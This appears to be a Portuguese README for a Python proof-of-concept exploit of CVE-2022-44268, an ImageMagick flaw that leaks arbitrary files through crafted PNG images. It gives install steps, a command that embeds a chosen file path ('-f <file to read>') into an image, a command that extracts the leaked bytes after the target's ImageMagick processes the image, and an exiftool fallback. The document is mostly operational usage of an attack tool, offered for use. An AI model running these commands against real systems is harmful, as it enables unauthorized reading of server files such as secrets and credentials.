
PoC em Python para CVE-2022-44268 que incorpora conteúdos de arquivos arbitrários em imagens PNG via ImageMagick, com suporte para extração via exiftool.
Alguns PoCs não funcionam para conteúdos específicos de arquivos. Este PoC pode funcionar para conteúdos que não funcionam com outros PoCs.
Clone este repositório com Git. Em seguida, instale os requisitos.
pip install -r requirements.txt
Para incorporar seu payload em uma imagem:
python3 MagickPNG.py -i <image to modify> -f <file to read> -o <output file>
Em seguida, use o ImageMagick para atualizar seu PNG.
Para extrair dados do arquivo modificado pelo ImageMagick:
python3 MagickPNG.py -d <resulting image> -o <output file>
Se isso não funcionar, tente usar o exiftool para extrair os bytes como hex.
exiftool -all:all -s image.png -b